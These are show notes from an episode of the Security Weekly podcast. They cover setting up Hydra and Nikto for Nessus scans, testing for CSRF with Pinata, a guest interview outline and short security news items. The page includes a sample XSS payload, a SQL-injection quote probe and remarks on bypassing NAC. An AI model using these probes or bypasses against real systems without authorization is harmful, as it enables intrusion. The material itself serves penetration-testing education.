Episode214

From Paul's Security Weekly
Jump to: navigation, search
Palo Alto Networks
Tenable Network Security
The SANS Institute
Pwnie Express
Black Hills Information Security
BlackSquirrel
Onapsis

SANS Las Vegas from October 26-27th will debut a new course titled "Embedded Device Security Assessments for the Rest of Us" which will teach students how to assess embedded systems of all varieties on pen tests and in your duties as a security professional. Register Here


Episode Media

MP3 pt. 1

MP3 pt. 2

Sponsors & Announcements

"And now from the dark corners of the Internet, where the exploits run wild, packets get sniffed, and the beer flows steady its Security Weekly!"

"Sponsored by Tenable network security. Tenable is a developer of enterprise vulnerability, compliance and log management software, but most notably the creators of Nessus, the worlds best vulnerability scanner. Tenable's Security Center extends the power of Nessus through reporting, remediation workflow, IDS event correlation and much more. Tenable – Unified Security Monitoring!"

"Core Security Technologies, helping you penetrate your network. Now version 10.5 full of Jive! Rock out with your 'sploit out! Listen to this podcast and qualify to receive a 10% discount on Core Impact, the worlds best penetration testing tool."

"Cenzic, create a Hailstorm for your web applications! Sign up for a free trial of the Hailstorm software or scan remotely with their new online service to keep you web applications in check."

"And Trustwave's SpiderLabs - providing advanced information security services to planet Earth. Visit them online at trustwave.com/spiderlabs!"


Security Weekly - Episode 214 - For Thursday October 7th, 2010.

  • Announcing Hack3rcon!The con will take place on Oct 23-24, 2010 at the Charleston Civic Center, alongside CharCon, a gaming conference that will interest many of you as well. Tickets are $40 for the whole weekend.
  • Mark Baggett teaches SANS 504 during SANS San Antonio for 6 days. Come learn Hacker Techniques, Exploits & Incident Handling! November 13th thru 20th.

Tech Segment: Paul's Nessus Scanning VM

I've been working on updating my Nessus scanning VM that I use for the advanced Nessus course. There are some tips and tricks I had to do in order to get third party tools working such as Nikto and Hydra. Nessus has plugins that are wrappers for these tools. I like to use Hydra because it lets you upload custom username and password dictionaries. My suggestion for people is to use a small, custom username and password dictionary for Nessus scanning. Nessus contains plugins that will test for certain default or easily guessable passwords, however Hydra lets you upload custom ones. Keep it small though, as it will add time to the Nessus scan. Nikto is also nice too, as it will test web applications for some different stuff.

Step 1: Failed Ubuntu Upgrade

I am running Ubuntu 9.10. I attempted an upgrade to 10.10, I started by prepping:

  • Take a snapshot
  • apt-get update and upgrade
  • reboot for kernel upgrade
  • change package repos
  • Do another update and upgrade

The upgrade completed, and I got a horrible error:

aptitude install procps
aptitude: symbol lookup error: /usr/lib/libstdc++.so.6: undefined symbol: _ZNSt7num_getIcSt19istreambuf_iteratorIcSt11char_traitsIcEEE2idE, version GLIBCXX_3.4

Thank God for the snapshot! I reversed the upgrade and will wait. 10.10 is stable in 3 days, so hopefully an upgrade at a later date will go better.

Step 2: Hydra

A new version of Hydra has been released, so of course I want the latest:

  • Download Hydra 5.8
  • Important to install in /usr/local so Nessus an find it:
 ./configure --prefix=/usr/local --disable-xhydra

-Thanks to one of my students, Gebhard, These are the fixes to the Makefile needed to compile Hydra successfully on 9.10:

-XLIBS= -lssl -lncp -lpq -lsvn_client-1 -lapr-0 -laprutil-0 -lsvn_client-1 -lapr-0 -laprutil-0 -lssh -lcrypto
+XLIBS= -lssl -lncp -lpq -lsvn_client-1 -lapr-1 -laprutil-1 -lsvn_client-1 -lssh -lcrypto

-XIPATHS= -I/usr/include/subversion-1 -I/usr/include/subversion-1
+XIPATHS= -I/usr/local/subversion/include/subversion-1/ -I/usr/include -I/usr/local/include -I/usr/local/subversion/include/apr-0/
  • now build it and install it:
# make
# make install

Now you can upload dictionaries and use Nessus:

HydraNessus.png

Make sure you reduce the number of threads!

Step 3: Nikto

  • download nikto and install it:
wget http://cirt.net/nikto/nikto-2.1.3.tar.gz
 tar zxvf nikto-2.1.3.tar.gz 
 cd nikto-2.1.3
 mkdir /opt/nikto
 cp -r * /opt/nikto/

Edit nikto.pl and change the path:

$NIKTO{'configfile'}  = "/opt/nikto/nikto.conf";    ### Change this line if it's having trouble finding it
  • Edit /etc/profile
export PATH=$PATH:/opt/nikto:/opt/nessus/bin:/opt/nessus/sbin
  • Re-compile and re-index the plugins:
/opt/nessus/sbin/nessusd -R
  • restart Nessus:
/etc/init.d/nessusd restart

And then you will see it in the preferences:

NiktoNessus.png

Tech Segment 2!!: XSRF Scanning with Pinata!

One of the harder issues to test for is Cross Site Request Forgery.  The reason it is so hard to test for is it is not a simple stimulus and response game.  For example, if i put in ' into a field and I get a 500 error I know there may be some level of SQLi at play.  The same holds true for Cross Site Scripting.  I send in <IMG SRC="javascript:alert('XSS');">  and it is reflected to my browser I am pretty sure there is XSS. 

But how can you easily detect CSRF?  The simple answer is you cant. But that is a good thing.  In fact it is wonderful. Here is why this is so good for all of us, it wont be automated in the near future.  Why?  Well it requires the tester to have some level of understanding about how the application works. You need to see how an application does things like: adding a user, transfers funds, open ports in a firewall.   What are the requests that create these conditions and, with many applications, where are the indications that the request was successful.  Sometimes it is easy.  Sometimes the page will respond automatically.  Other times...  Well, other times you may need to navigate to a completely different part of the application to see if the request was successful.    The beautiful thing is this is exactly what you should be doing for logic testing as well.

Since many automated tools cannot do this well, how can we approach testing CSRF?  First, find those sections of an application that deal with transactions.  Next, make those requests through a proxy where they can be intercepted.  Finally, create a page, that when visited, triggers the same request.  Pinata is an excellent tool to help with this process.  Well.. At least with the last step.  With Pinata you copy the request that was made into a file, then Pinata will convert it into a .html file that you can load and see if the attack launches. 

For the business logic, you still nee to find that on your own.

-strandjs (Fr. John)


Guest Interview: Brian Honan

Mr. Honan is the European editor for SANS NewsBites and founded the Irish Reporting and Information Security Service, Ireland's first national CSIRT (Computer Security Incident Response Team). He is also the author of "ISO 27001 in a Windows Environment".


  1. How did you get your start in information security?
  2. What is ISO 27001 and why is it important?
  3. Do standards help us, or do they just set a low bar for "security" and give people a false impression that they are "secure"?
  4. What is the function of a CERT? How did you come to start the first CSIRT in Ireland?
  5. What are the benefits to a country-wide CERT?
  6. Can companies benefit from having their own CERT?
  7. What can we teach CS students about security? How do we get them to understand security?
  8. What are your thoughts on mandatory breach disclosure? Doesn't it just hurt companies to disclose a breach? What if it doesn't affect customers? How do you enforce such a law if the company handles it internally?
  9. IRISSCERT is running its annual cyber crime conference in Dublin - what's being planned? Rumor is free Guiness?

Background notes on Mr. Honan:

  • Day job is running his own consulting firm BH Consulting, providing ISO 27001:2005 advice & general security guidance
  • Teaches Masters in Computer Science in Information Security at University College Dublin
  • Works with (The European Network and Information Security Agency) and has assisted them produce some of their white papers on security, in particular in the security awareness side of things.
  • blogs at Security Watch and contributes to the Infosecurity Network site and also to the strategy section of Irish online publication called Silicon Republic
  • COO for the Common Assurance Maturity Model which is a security/assurance standard being developed to provide vendors and customers with a transparent means of determining the security of the service offering. It is primarily aimed at cloud providers but can be applied to any IT service provider be they external or internal to an organisation. They plan to go into pilot with the model soon with a view to releasing it later this year/early next year.
  • Campaigned for mandatory breach disclosure laws to be introduced into Ireland and made submissions to the government's working group on the issue, which introduced a code of practise for mandatory breach disclosure in Ireland (1st country within the EU to do so). http://www.dataprotection.ie/viewdoc.asp?DocID=1085&m=f
  • Mr. Honan's Linkedin profile

Stories For Discussion

  1. Evil - [Larry] I'm really loving social network APIs. With them we have the ability to search for all sorts of things about people, this one for their phone numbers. This could get interesting.
  2. World's Sexiest Hacker - [Paul Asadoorian] - Is she? She got busted as part of the Zeus botnet. Yea, it was a slow week for stories! I still think that Larry is the sexiest hacker in the world, Dennis Brown may be a close second.
  3. Topic - "Does NAC Work Good enough" - So here's the thing, as pen testers, we know that NAC doesn't slow us down. If we have physical access we can spoof a MAC address, unplug a printer and use its MAC address, or with VoIP use VoIP hopper to jump VLANs. However, from a defensive standpoint, having NAC helps keep laptops from coming back on the network, prevents contractors and vendors from plugging in infected systems. To that point, does segmentation really work effectively? While you can put all the HR systems on one segment, is that effort really worth it? I tend to believe that putting systems in one segment just moves the problem around. Different segments need to talk to each other, and its not that hard to figure what's allowed and get around it. DMZ I believe is a good thing, but systems want to talk to each other. People will open holes, so is all the firewall administration worth the little protection it provides? I think in security we tend to move the problem around instead of fixing it. I'm saying put effort into patching your systems and monitoring your logs, rather than move the problem around.
  4. Man in the mobile - [Paul Asadoorian] - Bleh, too many buzzwords. However, two-factor authentication that send you a TXT message doesn't work so well if an attacker pwns your phone. So, do better.
  5. Hacking Tire Pressure Sensors - [Paul Asadoorian] - "The wireless sensors, compulsory in new automobiles in the US since 2008, can be used to track vehicles or feed bad data to the electronic control units (ECU), causing them to malfunction." I think hacking cars is neat, but unless there is money to be made, attackers will just yawn. Maybe there will be some pranks, but I don't see this being a huge concern.
  6. Tricking folks into security services? - [Larry] - I wonder how something like this would go over in our industry? I have a feeling not very well. Although I think for a parallel, in our industry if we are able to sneak something in like this, we're in, not just with trickery.
  7. Iphone app data - [Larry] - Buyer beware I guess? But, how would the average consumer ever know? Phone UDIDs (Unique IDS) can be grabbed by the API, and sent via app with other personal information, although it is "prohibited". Some even in cleartext...
  8. Dlink Video FAIL! - [Paul Asadoorian] - So fail, command injection, root/admin hard coded.

Other Stories of Interest